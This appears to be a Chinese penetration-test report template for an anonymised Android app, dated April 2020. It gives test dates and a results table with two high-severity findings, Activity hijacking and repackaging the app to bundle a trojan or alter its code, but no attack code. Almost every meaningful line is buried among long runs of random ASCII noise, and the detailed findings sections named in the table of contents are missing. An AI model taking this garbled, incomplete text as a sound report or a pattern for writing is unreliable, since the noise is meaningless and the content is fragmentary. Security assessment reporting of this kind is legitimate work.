& R$ ?% E: _; H1 W% w. t' Y3 R- q" {+ n, l/ S
; f1 T& U1 }2 j0 S
G J( ^9 l: h
- H' e9 w6 Q: G3 C
/ o7 V2 ?- W9 e& E- I. l5 y
# i' c+ [6 W$ r! K( y% d- s- @' a
! Y( w: M5 Z9 }. `4 z/ g ) c( {. P# R$ Q! b" y+ ^; R6 ]
8 \( e* l- ~3 \; | 9 E2 r' E$ I/ e$ i l( I
& r9 c: h4 q6 \* Y1 ?. Y6 R
文档编号:
4 `% f/ z4 ]" c8 j4 h1 T8 |! h) `; o
) H5 E( A' P' f' j. g7 p. q- s
/ \$ U# w7 j* M: n2 B" K: M: {+ W. r* e . p2 z* y* f1 Q% S
" v, u/ |% t4 Q' k * G: Z4 e9 j0 X5 {
8 _4 i2 Z' h) I' m# M
2 {8 |3 e: ?' S3 G; [3 m7 l
W" E9 x4 z8 p1 e
0 l! q7 F, H- d! R0 a1 ?, \0 y2 ?* q' t8 G! k5 y# j* t
T, a& W8 e( E2 }: q- u" k3 i* U; p0 E
# e! b+ f0 U R1 @* U5 L0 {" }3 {# u( }* d$ K7 ]: B
/ W5 c8 g s! v! j
% t) U- w5 [3 D: m/ {# @
" E7 b: {9 K! Z+ [! n8 a" a' ~# Y9 a" t
& S# j6 L- l# _6 [/ }. ~: e- b3 J6 s0 S& K$ R9 q8 Z
" Y. p' u( R& n- s& T# H3 v6 l- P f6 I& w
# u/ |. z o1 U6 K9 n2 [* i5 H
8 {/ J7 `( n1 W1 R4 ~
1 b" I2 L, N! [6 X& T
2 L$ p7 j2 P. c' H' Z
4 C! s: j2 T+ B0 L: i# p) O& D) g. d7 O( ]4 S2 w/ o
5 ~' D! C; F6 i/ ?3 e; U
7 N+ ~9 h! b6 u, i8 @& }
5 `2 f: o& e6 C1 A7 f
; U M7 _' p" C9 M. }6 M# u: \# [ 8 p, e* u$ r$ f. {4 x) l
( y$ L" r+ w* [: f- i2 O1 e
某某某APP渗透测试
- j5 i4 Q. o, c, p# |7 {0 R: _
; I& X; S7 T( e+ H
5 y% g3 |5 y' B) F& Y3 g
" l& L1 h' ~$ p4 g' q
# ^' c1 a! Z& I* }% ^
) e0 i% D- l: ~% g+ ~- ?
% R3 o. j/ Z4 t* [& u" N7 U2 m" _2 O: V
% g0 p0 w3 S6 n1 c
8 O& t& }# @4 N
/ W$ C) ?- [! M! N: k/ z
K( U+ p% G0 E& _
+ d& }: D9 e0 X ~9 F! g( t- i* B: f+ j9 }/ v& k
' R* T% R- R9 }9 g+ w0 A4 I
9 l# `1 t4 e! G; m& z/ B9 C . k7 W! M4 |" d# Y9 f Y
4 ?6 ^/ q! K/ t" ^
, j9 ^$ s) @% [3 B1 v: i2 t# r7 b, D2 P3 w& c- E; ^' \1 O d: K
* U' J: E& @; Q0 r1 P) k8 G3 s% T5 E$ X# u3 m! A
0 Z) a5 b3 U1 }& L( b
. t1 k, p. j& d \4 Y/ ?
5 ^4 M" ` C7 W3 c) ?
: x0 I( L9 z+ P' b' T; |5 X0 z
+ U8 N+ O; ]! L1 R; k! P0 g/ h( C1 Z) `% h2 z5 d; f2 o' C
$ e% |, K. M h6 l& u, \, I; G
: R+ Y. H* G" D" P* K$ ^
技 术 报 告
8 T ]0 @, z+ V9 T, P5 x" B/ C7 y+ }. ?6 R
3 J: W8 C; o. K- j: L
. J# J h6 V' M& n0 [1 ?! U ! f. Z0 I0 ?) O P$ h8 r
* C. @# C+ b) L, h7 }8 ^: Y
9 j. A+ V" t- ?. g/ M! o& ^5 g+ I- V) J* V1 B: F& m
! N3 i% M1 O4 ^
. [: z2 u" P u2 |9 T5 \. P/ ]
6 V( A! e* Y. O. V" k- ~! \' S2 Q+ s4 c8 i
4 u5 C( W3 n' {: l/ _& }0 D
* N: d% I) e1 @7 f: l& n
) `3 |, K0 B+ Y: G# s% D! o
5 F E5 f8 \& n" E# h: M 8 J# ?3 K" | R/ I ?) m- i4 K4 H
8 e4 K- \( |. J# h4 P
1 B! d5 _# {& K8 r' ^7 F
; u% c" b7 Y9 x0 I1 x# Z9 d* i
* _/ Y9 y3 z9 K6 ]- Z
1 i# q) Q7 G/ t0 V 5 w1 y1 H0 ~1 L0 X) }, h) u5 g
3 p% C3 W! m M5 c, t" r 4 I% P( w7 L- T( F! Z- j, A; r
( q6 M8 C; @- X' z3 J
6 n, K9 w: [9 o" ]8 ]! T! Z
5 `( Q0 D9 A6 `8 D5 s0 t / u& R% W1 B2 o4 ~; g! n
2 t8 M' L1 s6 l$ D6 ?! q$ E. B
/ p; N9 I U; ~* t. B
8 ^; Z" s* \+ I6 C4 y5 `! K
q/ s3 L: x" p1 x9 ^0 [
- `+ q. J* e/ o- _9 } |+ S: h
q8 ]6 k+ N) a+ n L/ `) p W5 A& [6 j; l- L
6 a/ G' ^) G' p- }7 w
9 b7 @$ V. I( E3 m9 ~$ @# m5 ]
" l/ D `# ^4 g% N. i. ?- M# s
( [) w0 _8 w0 n0 s: R
4 {& ^! x% N# D: @- U8 k ) `6 I8 g, E8 a- E
5 F* f t9 f, Q$ ]3 ~
/ N1 a6 z& N2 i% {' R
+ j. P5 c G7 e9 v8 } 7 R6 W# J v, U# Q# Q
1 T8 `, H# ^. D" c3 M4 z( B " @! O; I) |: l; K, @$ }
! _- K m# N, U4 p9 S
8 W$ j1 j! K8 s; E+ d
# F$ h! o$ N$ i* B
2 v7 V6 B2 Q, j% L* J7 _& u4 C3 t# p) O& Z9 x R0 r
I- Z0 L( [; ]6 B |5 X8 h8 T+ H6 V& Y' c R# i2 P& B& c
8 ~0 L2 o9 y3 |$ @1 t
3 Y9 m1 L% i/ [; w2 }+ B + B, |' a. v& Q4 [
! Z5 J: B5 M; ~1 u0 y" U
& S5 w1 K* x% \8 m# v$ J) n( V6 X
" n1 [/ ]9 P. p9 K7 x; M& p/ _) O( w0 @
/ Q2 M9 l8 O4 I2 T" C6 Z
& e4 z5 d# X- V4 B. Z( X, Y) ]
5 l$ ?6 l, M4 i. p3 U2 p
: w1 d" c" k% a" g# L n+ m4 W$ K$ q4 q6 j* n; X9 u% X+ y
$ h7 e! h# i( t* z/ r
& F z( p% W$ A* Q f, A E' w% Y5 H
4 D* x% K: ~: P5 k7 t
# ]3 \9 j' @4 M 7 ?# p( C3 m) b0 G6 y+ g5 K
* y; q1 T$ s" \" N, D
0 P# g; `: z( N9 e& D( N/ `$ o4 j
. d5 W( n& e& M3 F+ @
$ I* `5 f( Y( d
) S' }, K, b* J
! J: @! u6 o8 E2 L+ O
8 G1 O `% a; N* C% ^
* p- J0 C$ m9 v
: D0 \ e/ J* S! R- | - a! ^# `5 v: f
/ ?$ X. c8 R* H) g
9 z$ P+ \: G9 J2 \( h4 u3 C+ V5 g& d6 v
l8 B- Y. [/ B4 m
o7 _& m2 _0 c# P* t
- U/ ^0 ?1 a3 ` `8 S! i, D- R* [' l) k ?! J
, l% F8 p4 O2 g7 X! I/ l# \* F; g1 C# [! p& g) ?9 u
' G1 P; R5 i- k/ K
! e S' d: l; ^0 t- | 1 z! c% Y+ m4 w+ _8 R; T1 P3 H7 v
" T4 F& P$ s% K; i3 Z6 |9 c " z" L( e, M6 |( T% ^5 h, i4 p) F- Z
5 b. c' B$ }0 q0 M) U0 W
& c5 D6 h, ]7 Y" {2 o' K' J
) s/ m/ k+ h( V ' M2 B* S* g) W% O. [% O; Z4 p
! ^( _- Q0 C8 | 0 ?/ R8 m" P9 j+ e6 J
6 s3 l; [# g5 Z4 a- [3 c% O* E
& `8 W+ Y ^5 C' ]% F' ^% r1 f4 i' b+ _: w' ]0 c$ m+ M
$ n6 `, j) ? @7 n Q4 U
" K6 G8 _9 Y6 \( I
% L3 o; y2 f0 i" H) o3 h- R
3 [0 V+ q) ]0 l O6 i' e! {0 Y5 M
/ ]4 i/ I% x5 z2 E7 V
0 b3 R( I0 A* A7 H" R7 R9 v5 O
, Q' @4 h# z8 Z3 L# q
; W) O, a3 p4 ~6 S: J3 o 二〇二〇年
& Q% r0 `9 h/ E6 I2 {, y" g
4 l H6 n7 N: [0 ^. D$ R/ Y; C
# y2 Q4 o* g+ k" Z9 N$ _
% q" K5 z% D$ m5 F
3 X, O) D( |% h
6 [5 b( {3 N+ }9 P! ]
w2 ^: w" `& D$ \, D( e! f9 v+ W( v+ d" G
4 v2 a( a$ g" X4 k
: v9 l0 R0 \3 S* ^. ^+ a& X" |
8 {. z n/ t- s
3 x1 x! n" c9 b: ]0 u
, k2 l) U7 X: t N8 {7 R8 y
& X! u8 j$ J+ P4 o3 D; \# `! R# }
; f8 L! d* A& D( I* }1 _( C
8 P" v% Y+ z$ R* y# D
. V9 E. O; U2 n
& K6 @, |% |9 I# i" M
, k+ E5 m8 E* m$ a2 Q3 g9 I9 d( l
9 D1 |- Q7 E: J+ L9 H % }1 h, Q2 \( o# ^' K
5 T1 c) \4 E0 f2 n3 {
目 录 3 G3 K: A3 B2 n: q% b0 Q) t
x. ]: Q) r7 Z* M2 [2 B' N' b
! u# M1 M. L( \1 H& }( i% G3 s
5 ^( D2 @5 V' L% w
, h y- F) ^0 ^9 g
+ Z' |! I" H. N$ b5 G
. B0 ?+ K J4 A8 _) V& F
" F) y/ o w0 e8 {7 ^' B
U: {2 c2 j3 G+ s' |& v4 m/ D. w2 _3 ]" n/ U
! ]+ @) }3 V& s9 P: C" W. \5 T& ^: F" k! D4 ~$ V, J
8 t" _/ t) P* n! K' e( n
8 _, D+ T# q' j2 R5 C" ~ 1 概述... 3
' {" b8 x. z4 V; |6 o( h% k3 x0 N
( m/ Y+ A( y2 d
7 z6 v" {4 `, o3 \" B& E% s
, h) U7 y X* {# G K 9 ]8 |& J! L% c3 t: t6 W
4 ~3 Q: h8 H: ]$ X
1.2测试时间... 3 $ H3 S+ y. n6 ^+ R* W
! X3 U, E" x, g; P
2 b) w" k, E3 R9 ^2 t
, E. G5 \9 T) Z d& W
' T6 _- E% ^8 ~$ }
5 _! ~8 `, A' G+ Y% O 1.3测试对象... 3 v7 G! A% V) i: ~
0 l: V6 [: C5 }9 ?) j, G3 Y
3 x+ _9 n: O; ]* N2 P
" K1 x v. u i# y- k# M) k: }! R; k
* I6 a$ Y2 b. t* R# I2 E
7 C! f1 p5 e4 |. v7 N
1.4测试结果... 3
6 M. J( F S4 j, `
/ f- c9 {8 `8 ]$ @# g# G
( A, S: A) G" d) _- Q h a
' v' Y+ Z1 h( D8 k7 O: R0 C: S B" g
' ^% }$ H9 M' T$ h5 u
0 b5 o; x- a, } { 2 检测结果... 4
4 G. z- f; ?3 P& W: |3 @5 f1 s$ Y) a g2 g; n
3 l. Y2 f6 Z& E1 j5 t# T/ k
) @/ Z& D6 V& S0 `6 ]9 n; u- q; i3 I
4 y6 I1 L, e% o) R0 d& K' ]4 q6 `$ g% g! c' U' |, s5 g1 X+ _
2.1 某某某... 4
4 j& \9 l; w+ ~" J/ g$ S
) @; o @6 M: E' [6 y" \
: C2 Z% X# m( @7 ~
+ O% t$ i( J: x9 }. i G 6 I# D8 ^0 @( N* G# a P
, T% D& b% h# l; D7 `& h3 A 2.1.1检测目标... 4 + c, s% z$ n C# C1 K& g
" N3 _0 e9 `6 p [8 A' s; [9 a6 ]3 Y/ q
! ^9 K- o/ q9 u- Y
9 d- n2 h0 T, t% L7 |; @4 ?
$ G: V r' `$ T; h) q4 `
# I/ `8 Z, x, g2 [0 m3 l 2.1.2检测结果... 4 . }" y6 M! W9 Z7 ^
_: E4 }. c1 R& W
; F0 J; ]; q; z8 Q/ \) a4 T; L% X7 C1 {5 Y) c5 L
1 ]8 m7 ]1 \. l- J
" p3 g' i& l, V* C6 _: [1 g) k# m. w$ L
2.1.2.1. 4
/ k) ` y$ s% }7 b8 j: A# O% Z$ @( O, |1 a" L1 b \
4 z9 n% }9 C2 e0 P5 L: Z: k9 ~6 D# B, r2 t
# U/ p \8 d; k! u6 g4 ~
) l# _# [9 h" v$ I0 G% h. H 2.1.2.2. 6 & z2 W9 O" E0 \8 E9 m4 d
6 D0 b7 ?& l: b) {. Q( |/ a
9 [; h2 a% E, E
% @0 ]4 S7 l$ Y/ Y: {# s
/ V* y2 J/ X7 j, Q E! y4 {6 p3 |. j0 P6 a1 g! |. r+ `1 f- Y
5 g# v; L1 A5 U' v Q
. F5 }1 R; M. j/ e
& w, o& n/ P8 e) G$ U; }5 b2 Y9 ^5 u+ ^- N
4 D4 B* a* M) c' ^
2 z* l9 y" C; d! n1 K" P" T8 V
# I6 [# O! k) F7 L" K8 |7 Z% o( H2 ~6 `9 n8 @) P
g8 H( s# \6 G' L
* U9 f, P; h1 R, Z# M: F 3 G& Q' \* k1 N9 `( s5 q% p
8 ]* Z; i. ?7 \$ e( P9 B
0 x1 I5 h0 a! ]5 R/ Q% `; u/ j% Q- v8 U5 v6 x/ J
1 概述 / }" Y9 D9 P( D+ M" G
* g# s% t3 E) M& s4 S
' @% c& u) b9 V* c8 P+ m' ^0 U' L. P
, a! M, P: n. v$ R
1 A* l6 ?) K# c% G) L 1.2测试时间
& J) d7 A' a5 H$ ]* g9 A7 o. V" L$ b" C$ _0 z. g
0 o8 h+ w( Y0 s! l: ]8 v
2 g& v t) `4 [4 v. d4 x; Q
$ b. O, T8 [8 [
4 f/ ]* v- L3 @( u8 P2 O5 `
4 u1 ?. d9 C% K, w3 j$ j; E0 ^" u7 e# O# t3 c; H3 Z: S
% H& w4 _( C: Z. i1 T; o, X
6 z% W& ]& z4 J6 d, Z3 @( [0 E' V | % y5 ]- a8 l% i$ v) k" V4 z
" s( W) ~6 R& L- W* l! V
. h% x1 M: G; v
/ ~6 R" x* S3 Q1 v, x
渗透测试时间 4 ]& F7 P# b- D
' Z2 T3 n0 P& F# e
7 j; l2 Q$ o! ]* U# w- O
3 t$ z- m5 Y/ I) b# r* G# N8 I K |
/ e- G* q( t3 G- q& E% d
+ W d7 p$ S8 `6 X9 [
7 b. a- [. l! e( e6 i( o4 ~
8 p7 v$ G3 [9 E& I2 J# d
% |9 e E0 d9 g e$ W1 M' a
1 @. z3 I4 e6 ^" H1 D |
% P! A3 O7 A8 w* ^. W& Y4 x# J1 _; g( n2 o# D. O' q5 D, E
, Z8 E% Y# E7 E L7 s4 a# @% t9 K. ]+ n$ ]+ {. O2 d3 [2 ~
起始时间 & }4 h8 ]/ {! ~5 g
+ q3 N/ x# q* ^8 {& N( B4 a " {, l: q: B( W: s
7 I" e4 G" I4 X) \ | ; z4 h* w4 {9 E8 @: I
# q" K1 S3 {4 o x" B) R. @
6 G; y2 x4 P2 y& O) G K6 G/ |, j% H+ E& P
: [4 y) k* s9 a4 y0 z. E r% u8 V
- l+ P. x( r% B. z n
2020年4月6日 ; Y% I$ x: v, w ^ j6 ?
+ F6 k( I: K4 \# j : ]. @! _! j7 P6 t; A
2 a# K3 A" g# A3 j* C |
6 g( B2 b0 Y. P. ~
% l4 K) k, W' i% A- ` Q! B
: F$ ?' @1 ?! n
' B( ` ]/ T% t& }/ T9 @! o. [ 6 P8 n% H j" S9 @6 `
" }0 R+ l' s1 c0 w/ ?5 `$ w ?; C |
& o: y! G4 E5 [7 W8 @' ^" L
) e# ?1 S: z* g- f; x T
$ W/ ]" p5 t4 Z8 D. k. f
+ w& W7 y( c5 ^+ K6 X 结束时间
; f9 M6 ^' [4 z; b2 R) h8 U }; l; @ v F% s/ o8 \( Q
. i p' e! _8 g; u
- K/ k! M/ U; Y J: D. n |
1 i% C w4 n' B: k- [$ C3 f6 [+ J- L$ w% c, I! V1 i, u
u$ R3 N- @# d* r( \, `) X$ W+ F. o! L% s9 @+ R
# u2 q5 o% U* N$ r' X& L- u. o# C1 b+ ~$ Q) q" x7 [- z7 i$ ]
2020年4月9日 7 u3 u# q+ ]+ @9 A3 m( Z# f
( i$ A( Z% |( f; G: }4 J# { 7 f5 p0 U v2 A p L9 p
O4 k, W! M8 L8 t* T
| 8 V9 H& y) W- A
3 [: f: c/ N! I$ V7 O; J
' u x) |8 E* Y9 I& n. ~
- R9 i% E6 f5 x! t( }: l
, o0 g2 v/ }2 z/ F
. ?) H5 X0 a3 E, Y( N
9 f6 _- A: v) q$ \
. `. ~8 M/ Z1 N+ G+ y" R5 @# F ; g6 x# @2 `6 a7 i+ P5 x& l! {
3 P& Z& ^! e$ d6 i7 u6 V 1.3测试对象
9 k$ }3 p: X( G, j9 X3 ?: i b0 d0 q8 T
, R" N1 y1 N; A( u* K2 }6 ]
8 O \2 q, c2 A+ C
4 Q1 ~, D' }- v: l4 S! C+ `+ ]9 E5 [ q" L% Q
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
" `: f9 Z+ w2 n+ z+ Q' r- Q
: S" z& G) b! g* {% M
$ L- T3 S5 E! }
9 A; P) M1 G. {! a2 t! B" T/ l
2 Y! D) ?5 U3 ~9 D" d T/ @
( u& Z7 O! i# { 表1-1 检测对象 , \( Y! V) n$ F8 ^7 |8 W
4 ?5 y* Z' k+ b U9 e
+ o8 q0 A# H* n/ x4 i& L0 A
5 K' i& ^, h8 g2 ~, B1 [
3 O2 f1 o( \/ p8 c7 s3 u
; X9 F1 }. u/ o( U) C' }5 f
2 {9 w" O8 |& z0 |, m. ~) s% r! e! o# Q! ~2 u5 q* a
j7 N+ {* W& P% K0 R. l
: O' j+ N" Q, q2 L |
8 h/ N& N: w V& \ P0 S
s& v7 R( k* g8 ]# j
& u2 G, ]5 {1 y% \0 Y' ]' K# C; h$ x( C! y
序号
) m( l+ B% X5 l! c) O. p3 O0 f4 b3 d, p
8 S/ t9 w9 s j
' `, O: h+ i R- b# u( V6 J |
8 Q1 d }3 {( i7 u$ H y; Z5 I* e9 I- G
( { T* P. |( _. x9 k' u$ [; o" ]
7 c8 g6 D$ z6 A9 e/ W) q3 \
5 n( j* K5 S1 `( e- g% H6 p
3 u d4 N- e: ] 测试对象
2 H! l2 w6 T2 f( R5 \8 e8 l D* W* ~9 R( ] [9 r
$ Q; s& h, x8 g8 o y* N( T8 H
c( G8 Y* X" l! {1 y; t | & _- m" p0 U# g5 R. S
4 {5 L$ L' c3 W) d9 g# \
$ q+ X7 e' V& ^, j. d- `6 r1 j* O/ b/ s" J# w c4 h: u" l
& L9 x: k; F3 h% N: t7 ] P+ [3 g1 x/ Z) h
测试地址
1 E! r; V" E9 p* a7 T* z& v' u/ Y
" F4 W2 ]0 }* J' F. ]) `/ A* c, {" @5 a! ^0 ]9 {
|
& D% J/ _) H3 R0 D. X. [* A8 n1 s- |
7 B4 U8 B1 K5 h. i" m7 ~. P0 D; R6 h- i' C+ I3 u x
) p: A5 Q; O" E4 [) D$ n/ u" i& _
' E; o7 c" @$ J+ J0 v* \( S 安全漏洞
9 G" }; x/ N! F, V7 `9 U
/ N0 c8 t1 R& H7 H" m" @, ]( ]
1 X3 ?4 q v$ v% h' S9 Y, y% b* j
2 d2 L+ O8 I2 t1 } |
- x% g+ N8 O/ A. o
- Q' S" Z8 s* o/ Z5 u
, [: H6 ?5 V: F5 P6 x) D+ I1 k- D* A# b* _/ C
6 H9 M1 d }* I+ Z& A# g8 W- @! w; z! d" p' G
|
3 A5 K! Q) X) F2 N: Q& ?2 g
! E/ d6 v* c* o: e . |8 I" f9 I7 Y' x' v/ y
: b, T& I( n# d' f) M 1 : U) k: `( Q- B
, L+ C" A4 g1 M+ l( ? 4 A. E) k* F( d- k; L3 w+ P a
- S$ X3 D3 F9 H) @ | 6 X( L" ^) c1 Q j9 x6 q" h
2 O9 [% V7 Z( S; k
) c! K+ Q2 a/ z" ]+ w! n" }
; ^7 x( |$ O& i" i! \
" s# r5 b+ a1 E3 N+ k+ W1 ?' b& |% t( Z/ t% }
某某某安卓APP : `& Q4 O: i$ M
1 y# O+ P! o, L7 d4 l6 W
- ?' ^4 ]3 I& W& t( t
- K _& q1 R G" f
| * z& u4 T, A/ L% \0 b, i* U& j9 k; _
- }+ W) b1 ~/ X! e+ W4 M 7 ^0 c. `* @ [$ N0 B- y6 ^9 @- p
* Z% e e3 T0 W0 O) ]5 K
( {0 m6 w5 G" d7 z; E9 X1 G) [6 \
% ]0 Q1 I. o$ O+ o8 q
1 f2 t0 x# G$ Q1 _7 H
9 t& p& }+ R# H% o
9 D6 W5 N9 _* u; v# x* a4 A! Y |
! G" [3 }; F, ^! w+ H9 }1 j
7 }- ]& _2 p% ^2 o2 S% O5 M2 C
, e5 d; W1 J: o% R# X* ~ v, }1 Y: Z
/ O4 a8 ~+ D! v9 R3 u O/ D; L% q
9 x8 M" D) Z+ H 2 % l: |2 I# G- h+ m! F6 E: [. M; {
) u+ K; a6 _$ I g) r) C
+ m& a/ s. O J4 [( W+ U+ F; l
5 T) [* @6 j/ k. y, t, T7 P/ i5 u |
1 |4 n( A7 {1 N L" ^
# g8 e, |' ~% J
9 S( R; }$ W/ ^+ O, n2 B1 Q; X$ k* g5 a2 a6 \4 o
0 I$ q' O. z2 N3 {/ t# I
$ `/ [( e# g$ i3 ^
o2 W6 q% s* }! [. z; \/ N
: `; I) I' i& a0 e/ {" v9 L# e8 Y ) e5 j5 ]7 ?' X
. H/ t+ C. [' z( K) r 1.4测试结果
' O6 q& e [7 p& f
* f C- T4 ^1 ]. U
% _5 m& m2 {7 d; n0 B
/ p, n- F9 @. i; ^, k+ O! D
( }! M2 \ f- p7 A( M3 Y, r) c$ _) j6 Q- j
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: / h; x! ~5 q" ]7 H! X7 q3 z
" U8 E# k: |# z) m8 I
/ ]& Y8 g' u% C/ ^3 g5 l
* v( v* G: v* V% P6 A0 ~8 [% V
! G! p- q0 f/ z1 r% h3 {
/ w1 n0 N! |" P+ |
. m$ {" _' y$ ~# g
# x7 f" E! M7 [: ^. a0 C
3 v$ l% \3 D+ m% X9 ?
* x/ ~; ?* X3 L2 U2 h 3 \2 w0 p, v: y; f$ Y2 I' w# @1 N
/ N, ~: N; M, X
k3 C$ A1 S# h& [! }- f% p* K$ b' J) `; V, Y5 S0 ?' w
/ B2 R4 D( a( E) c4 [% C$ a3 m' v; W$ D
! @1 E7 i8 p, F7 m% S7 i9 X
" J0 y, N8 ?7 E$ e4 [4 l
| + q; f5 c5 Z% z/ L7 a$ u3 B
( V' G; W2 E7 l V) Z% h
0 C2 x# G! v% t. k/ d) t' a
9 R. u3 _6 o) v& @' w8 r 序号
% c) G) @ T8 C4 L+ w( `$ l" N
4 [- w* N5 ~5 K, H6 d9 \
: B, f6 ]9 f0 c$ W7 q
: Q* t7 M4 G9 g | . A4 r3 U7 w' |
: `% Q* H& w% U/ A7 e* i$ w6 k
0 l, l/ U3 e& ~! w0 q, E
& Z$ T$ ?2 n3 g 7 ?+ n# U9 V+ ]! D
# Z! w+ q i m9 ~ 系统名称
$ q) z1 h3 I# J1 c0 V, g
& w+ H" ?4 V; G
" J t& g6 H# r2 U* i. e, I3 S. b7 i. G* J2 A6 _
| 9 P' U2 B: u' ~' K! x" L- b" W
* g6 X0 f q6 g
& O+ x' R7 m& Z6 G: L% C' ~
" H" n w: t' f+ T' Z/ l! F 0 [% h$ O' F. B) ?) ]$ y4 i/ t
$ R6 r9 ]7 d2 _! R1 j6 c0 A5 g7 m% r
漏洞名称 8 K; Y8 N6 t& M
4 x5 k7 ~, F, i1 ~, M8 n: K
$ I7 E& [1 m9 X2 d
$ t+ V' W' u" V. t& v* m | , g; d% Z1 ^1 l6 y7 h
* d+ H) B/ Y) b: W
0 h; ^9 ^6 j0 q! h3 ~
5 C7 G( i- u s: l8 a9 z& b
9 P# N0 U3 W3 A( \$ N. R" p) z( C% o, H7 w: U, a
漏洞危害
0 D7 m6 h1 N+ W' I d
4 }+ b1 h, ^ ]$ Y8 ^! }0 b& r ( r& D( _; | a. i2 z8 R5 t
$ z( }% [6 ]/ a* d7 G |
/ g8 f" M( o$ C; X' n/ {: H' ~5 \# w
; |* X- a$ _3 ^" W* E* O
2 }5 t/ l2 m0 m; V* b- B% I
5 _& D5 q0 Q% R3 f1 F9 L
/ u& j: B8 _9 e0 u/ J* l% E
' l; x7 e$ A) }8 e$ g0 x 修复结果 ( E( m% G& w) a& M) x+ {
/ v3 P! e" [1 y/ f
4 O0 ^1 X O4 W/ b0 B8 c1 k4 M
: m% j: ~3 L' v | 7 y, {6 F9 ]& x5 D
$ M3 r* T: a6 c# U$ s& x# R; [& t
7 k4 ^1 r9 @& K4 N9 `9 S
8 b3 e. s4 J! i; l7 P. E3 x
. H' B; B6 |( T$ Z3 |. C% v% a/ N% g' k0 ~! ]
| : v% I/ R1 [+ W
8 X9 W. I" z# o/ t: {
+ Q6 ]$ f: |+ Z! q, h; W- { u8 |3 Z2 C$ l
1 s7 ~& H! f5 T' k# a+ w+ s( T3 B
- r5 |$ e6 ~; k# Q 8 H1 }# A0 C. O5 b6 |/ c
* I' ]; t: F' y1 A" H; Q5 J |
! J9 L( \+ C6 {9 O. W9 R% k# _9 n% F1 t# V- ^! c
% F [, l" Q4 h) b' K; X- |/ t! z4 j
) G5 E( ^3 c/ a- e& m 3 }; u, e' B1 r- L; u- l7 l
* v+ L: @, P- L" ~" j 某某某某某某APP $ V( e) P, l7 r6 ^( F5 ^
9 F+ W/ \' G8 Y! f1 g ( T4 q" D* B3 v% @
6 f* o! t/ |7 s4 Y9 O8 m |
7 N; X# \ @) H- H
6 y- A) N7 v l- S( K
' a$ t7 O0 c) n8 K
1 H. _% Z$ I3 Y6 _ 3 h9 J) x/ z# f* p1 _6 V- {
+ N. J& U+ c" n0 w6 N. T6 X Activity 劫持
3 X' U) k+ o# @/ h) a! G+ T5 p6 z5 D7 O' a9 {4 G
2 C8 A. N" `, K, X) a0 \
7 d N( {# [6 [' s1 z% R
: T4 X2 c2 P0 Y) w) `6 j3 n1 b
' Y3 a6 w" @9 e
; ^5 ~8 T4 M# R4 H$ _/ w0 d8 \% n7 s+ Y/ A' D% |
" F! F# _1 Z9 }2 e
' A$ ~ H# N, m7 W1 @( z
| ( c7 M/ i5 Q% @; ?, q
9 y) l+ J( m9 T: ?: h4 m( L& S6 e
1 W/ f4 |+ P/ z1 T1 o3 l
/ D0 D2 R- t; f( W1 V
2 g, y" X0 n* n6 n
, |0 z) O; p* h% q 高 ( z/ H$ b( G& ^; @& a( m- C
. q L. {2 E* o: f1 Y% G- v9 C5 C
& R" ?/ k' }7 l) }6 h6 d' L( Y" l& a8 r" ~) ~2 z; s
| 3 ^$ R$ w. i0 z) n
+ w2 t8 z. }- ^* j Q* q ) M& o w7 ~ {7 y) [
9 k8 c1 K/ j" F4 L
3 a9 v6 x& l2 U5 p* B
4 w. N5 h# d/ p! R7 T 8 ?) z3 L: {6 Q+ \; l
9 [0 a) e( P/ [' y; z
; A' O3 m) s# o6 j! Y1 f# G6 Y. B1 b# R' i; d
|
7 X7 ?( T9 _7 o! o8 s
$ K' n. X, `8 ?9 t, L
; G$ x1 P# n) P* A/ g- H
3 n1 Q$ _9 T& g- b
7 _0 p! Z) i7 o5 A9 x i7 b$ z) _
% \; H3 h0 h$ D, v$ i |
8 M2 Q" Q" |5 j5 Z0 _6 n
2 z( K; V* y& [: ~
: h4 r- G. B1 ^* }, r# u
3 c8 [) n# X1 ^/ X 2 4 b) C# m: |3 d, \9 {: Z
) J2 ?2 ^ H6 C% u' `2 e
/ H8 v( p+ L3 f @
6 X U6 S# d! c
|
U( I# U; e; u& y
; I. t5 b8 f7 L5 w- F # E: b+ y A0 m
) G$ c: |* F8 X
6 }3 R- P0 x4 ?/ j# p, l
( {& ]+ F! J7 U/ |% V" c2 d
某某某某某某APP 9 c7 q- v, x P3 A( {3 H9 N
* w- v5 ~. \1 v! [. P4 |
( }+ ?7 Q; t2 P( O
8 G ?% N* v, k# _ |
5 b: X7 |" b& a1 U2 Q/ Z5 k0 ^8 ?* T8 z; b; H# m
, i! ]4 t" a6 `$ A
8 P5 ~% h" x( F3 B: h2 f @3 j B
7 \ i# X3 m. G8 a" h* i7 e0 l
. p. |1 M% e5 G/ Y! ?# R' z 反编译二次打包捆绑木马、篡改APP代码
% m1 }4 L' B1 _1 _$ e4 }) E* Z% m4 o3 p. p7 T9 `1 [
7 B) `" M$ @ P* d! q9 r. M: P5 D
- `2 h( }' n' A7 L) Q9 g6 o | # \: Y: K0 `) _9 e+ m6 X: d
. K4 k1 P. J* N
. p, ]/ D, F( @3 \" y3 |3 w3 D, a
+ H6 g2 D! u$ F6 D! F# e" x/ O
$ g: J* r9 Q- \0 \% f6 {6 S4 u9 K, c" q1 a- L. }# H! e( o
高
1 M n$ x$ O# P# Q3 a
1 q" w6 Y/ J! ?$ w
# W' }" B- b' R+ H! `2 V& R6 y! F* c) S$ `. Z
|
4 Q3 {- S8 c6 B4 s9 `7 W! d3 a1 p( v3 ~/ `& w
8 z R5 G' y$ g% Y7 ~( e |- [
9 b3 N% P; ?" K0 N* W3 } 1 i8 _! l! h9 Y* q$ B v2 ?$ V
7 e* |# h) G: h& r, U
2 x- r6 A: T% w
( e1 r- O- K7 ~' C2 w ) }# G8 S. O o' \
2 ]; U* G) h! j% I& G# o# V
| 6 D5 f- ^8 f" P5 C( M" d1 j
3 R4 D! \# ], ]2 A% {; e& n! p9 Z
! Z6 ?' X, q. _/ d& O1 r! B) n, \; L F$ x
# z/ R' N6 Q+ C( a
- V/ B( w4 J$ \* i
( V6 a3 g8 G3 a o
* |8 P- W% e' i' m - K. l0 P- x/ L
3 m& \( @ u4 }0 U
# Y0 {, T' c+ B" B: i/ Y! M/ T1 y4 C' u- A
. N* p" A* D$ J: r- T7 i
# i! R% F/ G8 ~+ `! D1 X- G; A
( [. k7 V5 ] _2 _
9 A$ i& }) P- ~4 f
: j" W8 x+ j. u* O* R
- j# [: C5 I' O5 `6 } 表1-2 测试结果 8 ^; I) j& A9 N _
